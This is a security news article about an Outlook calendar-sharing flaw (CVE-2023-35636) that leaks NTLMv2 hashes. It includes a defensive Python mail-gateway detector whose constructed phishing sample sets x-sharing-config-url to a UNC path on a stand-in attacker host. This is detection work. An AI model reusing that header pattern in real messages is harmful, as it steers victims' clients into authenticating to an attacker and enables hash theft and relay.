A recently patched vulnerability in Microsoft Outlook could be exploited to capture a victim's NTLMv2 hash (the challenge-response value a Windows client sends when it authenticates, which an attacker can relay to another service or crack offline). All the victim has to do is open a specially crafted file.
Tracked as CVE-2023-35636 (CVSS score: 6.5), the flaw was fixed by Microsoft as part of its December 2023 Patch Tuesday updates.
In an email-based attack scenario, Microsoft explained, the attacker sends the targeted user a specially crafted file and convinces them to open it. In a web-based scenario, the attacker hosts the file on a website they own or have compromised, or on a site that accepts user-provided content, and lures the user to it.
Either way, the attacker has to get the user to follow a link, typically delivered in a phishing email or instant message, and then open the file; the flaw is not triggered without that interaction.
CVE-2023-35636 stems from Outlook's calendar-sharing feature. An attacker crafts an email that carries two extra headers, "Content-Class" and "x-sharing-config-url", with values that point the sharing configuration at an attacker-controlled host. When the recipient opens the shared item, Outlook connects to that host and authenticates to it, handing over the user's NTLMv2 hash in the process.
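The check a mail-gateway or SOC engineer would want for the message described above, added here as an example (it is not Microsoft's or Varonis's code): it parses raw messages and flags any whose x-sharing-config-url points at a host outside an allowlist, calling out UNC paths separately because that is the form that makes the client open an SMB session and answer an NTLM challenge. Only the two header names are taken from the write-up; the "Sharing" value, the sample messages, the host names and the allowlist are assumptions.

```python
"""Flag inbound mail whose Outlook calendar-sharing headers point at an
untrusted host.

Added example for the technique described above; not Microsoft's or
Varonis's code. It assumes only the two header names quoted in the
write-up, Content-Class and x-sharing-config-url. The sample messages,
the header values, the host names and the allowlist are constructed.
"""
import email
from email.message import Message
from urllib.parse import urlparse

# Hosts that legitimately serve sharing configurations in your own
# environment (assumption; populate from your tenant).
TRUSTED_SHARING_HOSTS = {"calendar.corp.example"}

# Constructed samples, not real captures. 203.0.113.10 is a documentation
# address standing in for an attacker-controlled server.
SAMPLE_PHISH = b"""From: sender@example.net
To: victim@corp.example
Subject: Shared calendar
Content-Class: Sharing
x-sharing-config-url: \\\\203.0.113.10\\share\\cal.ics

Please open the shared calendar.
"""

SAMPLE_LEGIT = b"""From: colleague@corp.example
To: victim@corp.example
Subject: Team calendar
Content-Class: Sharing
x-sharing-config-url: https://calendar.corp.example/team/cfg.ics

Team calendar attached.
"""

SAMPLE_PLAIN = b"""From: colleague@corp.example
To: victim@corp.example
Subject: Lunch

Noon?
"""


def sharing_config_target(value: str) -> tuple[str, str]:
    """Split a sharing-config value into (scheme, host).

    A UNC path (\\\\host\\share\\file.ics) is reported with scheme 'unc'.
    That is the form that makes the client open an SMB session to 'host'
    and answer its NTLM challenge, i.e. hand over the NTLMv2 response.
    """
    v = value.strip()
    if v.startswith("\\\\"):
        host = v[2:].split("\\", 1)[0]
        return "unc", host.lower()
    parsed = urlparse(v)
    return parsed.scheme.lower(), (parsed.hostname or "").lower()


def assess_message(msg: Message) -> dict:
    """Return {'suspicious': bool, 'reasons': [...], 'content_class': ...}."""
    cfg = msg.get("x-sharing-config-url")
    content_class = msg.get("Content-Class")
    if cfg is None:
        return {"suspicious": False, "reasons": [], "content_class": content_class}
    reasons = []
    scheme, host = sharing_config_target(cfg)
    if host not in TRUSTED_SHARING_HOSTS:
        reasons.append(f"sharing config served from untrusted host {host!r}")
        if scheme == "unc":
            reasons.append("UNC path: opening the item triggers SMB/NTLM "
                           "authentication to that host")
    return {"suspicious": bool(reasons), "reasons": reasons,
            "content_class": content_class}


def assess_raw(raw: bytes) -> dict:
    """Parse a raw RFC 5322 message (compat32 policy, header values kept
    verbatim so the UNC backslashes survive) and assess it."""
    return assess_message(email.message_from_bytes(raw))


if __name__ == "__main__":
    for name, raw in [("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT),
                      ("plain", SAMPLE_PLAIN)]:
        print(name, assess_raw(raw))
```

Run it over an .eml corpus or wire assess_raw into a gateway hook; the allowlist approach is deliberate, since a sharing config that points anywhere other than your own calendar infrastructure has no legitimate reason to exist in inbound mail, whether the target is a UNC path or an HTTPS URL.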
Dolev Taler, the Varonis security researcher credited with discovering and reporting the flaw, said that NTLM hashes could also be leaked through Windows Performance Analyzer (WPA) and Windows File Explorer. Those two attack vectors have not yet been patched.
What makes the WPA case notable, Taler pointed out, is that the tool attempts to authenticate with NTLMv2 over the open internet. NTLMv2 is normally used only against internal, IP-address-based services; once the NTLMv2 response travels across the public internet, it is exposed to relay attacks and to brute-force cracking.
The disclosure follows Check Point's report of a "forced authentication" technique that can be used to leak a Windows user's NTLM tokens by tricking them into opening a rogue Microsoft Access file.
In October 2023, Microsoft announced plans to phase out NTLM in Windows 11 in favor of Kerberos, citing NTLM's lack of support for modern cryptographic methods and its susceptibility to relay attacks.